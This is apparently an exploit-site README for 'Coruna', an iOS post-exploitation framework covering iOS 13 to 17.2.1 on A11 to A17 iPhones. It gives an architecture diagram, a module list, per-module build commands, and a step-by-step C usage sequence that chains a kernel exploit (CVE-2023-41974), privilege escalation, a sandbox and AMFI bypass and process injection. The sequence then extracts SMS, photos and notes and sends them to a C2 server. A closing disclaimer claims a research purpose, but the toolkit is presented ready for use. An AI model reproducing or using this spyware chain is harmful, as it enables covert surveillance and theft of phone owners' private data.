## https://sploitus.com/exploit?id=2A6EA6E0-2991-59C7-9B0B-44BE39982D89
# Coruna Post-Exploitation Framework
## Overview
This is a complete iOS post-exploitation framework, implemented on top of Coruna's exploitation chain and the dump.bin kernel exploits. It supports iOS 13.0–17.2.1 and works on A11–A17 chips.
## Architecture
```
┌───────────────────────────────────────────────────────────────────────────┐
│                    Coruna Post-Exploitation Framework                     │
├───────────────────────────────────────────────────────────────────────────┤
│                                                                           │
│  ┌─────────────────────┐ ┌─────────────────────┐ ┌─────────────────────┐  │
│  │ Kernel Exploitation │ │ Privilege Escalation│ │ Sandbox Bypass      │  │
│  │ (CVE-2023-41974)    │ │ (cs_blob Tampering) │ │                     │  │
│  └──────────┬──────────┘ └──────────┬──────────┘ └──────────┬──────────┘  │
│             │                       │                       │             │
│             └───────────────────────┼───────────────────────┘             │
│                                     │                                     │
│                          ┌──────────▼──────────┐                          │
│                          │    Task For PID     │                          │
│                          │ (Process Injection) │                          │
│                          └──────────┬──────────┘                          │
│                                     │                                     │
│             ┌───────────────────────┼───────────────────────┐             │
│             │                       │                       │             │
│  ┌──────────▼──────────┐ ┌──────────▼──────────┐ ┌──────────▼──────────┐  │
│  │ SMS Extraction      │ │ Photo Extraction    │ │ Note Extraction     │  │
│  │ (Messages)          │ │ (Photos)            │ │ (Notes)             │  │
│  └─────────────────────┘ └─────────────────────┘ └─────────────────────┘  │
│                                                                           │
│  ┌─────────────────────────────────────────────────────────────────────┐  │
│  │ C2 Communication                                                    │  │
│  │ (HTTP/HTTPS, Heartbeat, Command Receipt, Data Return)               │  │
│  └─────────────────────────────────────────────────────────────────────┘  │
│                                                                           │
└───────────────────────────────────────────────────────────────────────────┘
```
## Modules
| Module | File | Function |
|-------|------|-------|
| **kernel_exploit** | `src/core/kernel_exploit.c` | IOSurfaceRoot Exploitation |
| **privilege_escalation** | `src/core/privilege_escalation.c` | Privilege Escalation (cs_blob Tampering) |
| **sandbox_bypass** | `src/core/sandbox_bypass.c` | Sandbox/AMFI Bypass |
| **task_injector** | `src/core/task_injector.c` | Process Injection |
| **c2_communication** | `src/core/c2_communication.c` | C2 Communication |
| **data_extractor** | `src/modules/data_extractor.c` | Data Extraction |
## Supported iOS Versions
| iOS Version | Kernel Exploitation | Privilege Escalation | Sandbox Bypass | Status |
|-------------|---------------------|----------------------|----------------|--------|
| 13.0–14.x   | ✅ | ✅ | ✅ | Supported |
| 15.0–16.x   | ✅ | ✅ | ✅ | Supported |
| 16.3–17.2.1 | ✅ | ✅ | ✅ | Supported |
## Device Support
| SoC | Chip  | Device        | Status |
|-----|-------|---------------|--------|
| A11 | T8015 | iPhone X      | ✅ |
| A12 | T8020 | iPhone XS/XR  | ✅ |
| A13 | T8030 | iPhone 11     | ✅ |
| A14 | T8101 | iPhone 12     | ✅ |
| A15 | T8110 | iPhone 13     | ✅ |
| A16 | T8120 | iPhone 14     | ✅ |
| A17 | T8130 | iPhone 15     | ✅ |
## Compilation
### Local Compilation (Requires Mac + Xcode)
```bash
cd src/core

# Kernel Exploit Module
# Note: the clang minimum-deployment flag is spelled -miphoneos-version-min (hyphens, not underscores)
xcrun -sdk iphoneos clang \
    -arch arm64e \
    -shared \
    -framework Foundation \
    -framework IOKit \
    -framework CoreFoundation \
    -o kernel_exploit.dylib \
    kernel_exploit.c \
    -miphoneos-version-min=13.0

# Privilege Escalation Module
xcrun -sdk iphoneos clang \
    -arch arm64e \
    -shared \
    -framework Foundation \
    -framework IOKit \
    -o privilege_escalation.dylib \
    privilege_escalation.c \
    -miphoneos-version-min=13.0

# Sandbox Bypass Module
xcrun -sdk iphoneos clang \
    -arch arm64e \
    -shared \
    -framework Foundation \
    -o sandbox_bypass.dylib \
    sandbox_bypass.c \
    -miphoneos-version-min=13.0

# Process Injection Module
xcrun -sdk iphoneos clang \
    -arch arm64e \
    -shared \
    -framework Foundation \
    -o task_injector.dylib \
    task_injector.c \
    -miphoneos-version-min=13.0

# C2 Communication Module
xcrun -sdk iphoneos clang \
    -arch arm64e \
    -shared \
    -framework Foundation \
    -lcurl \
    -o c2_communication.dylib \
    c2_communication.c \
    -miphoneos-version-min=13.0
```
### Compilation Using GitHub Actions
1. Create a GitHub repository.
2. Upload the code.
3. Push it to the main branch.
4. GitHub Actions will automatically compile the code.
5. Download the compiled dylibs.
## Usage
### 1. Initialize the framework
```c
privilege_context_t ctx = {0};
coruna_init(&ctx);
```
### 2. Execute the kernel exploit
```c
coruna_kernel_exploit(&ctx);
```
### 3. Perform privilege escalation
```c
coruna_privilege_escalation(&ctx);
```
### 4. Bypass the sandbox
```c
coruna_sandbox_bypass(&ctx);
coruna_amfi_bypass(&ctx);
```
### 5. Extract data
```c
void *data = NULL;
uint32_t size = 0;
// Extract SMS
coruna_extract_data(&ctx, "sms", &data, &size);
// Extract photos
coruna_extract_data(&ctx, "photos", &data, &size);
// Extract notes
coruna_extract_data(&ctx, "notes", &data, &size);
```
### 6. C2 communication
```c
// Initialize C2
coruna_c2_init(NULL);
// Send data
coruna_c2_send_data("/data", data, size);
// Send heartbeat
coruna_c2_heartbeat();
```
## References
- [Coruna Exploit Chain Analysis](https://github.com/khanhduytran0/coruna)
- [dump.bin Kernel Exploit Analysis](https://github.com/matteyeux/coruna)
- [Google GTIG Report](https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit)
- [iVerify Analysis](https://iverify.io/blog/coruna-inside-the-nation-state-grade-ios-exploit-kit-we-ve-been-tracking)
## Disclaimer
This project is intended solely for authorized security research and vulnerability reproduction. Using this framework to attack others' devices without permission is illegal.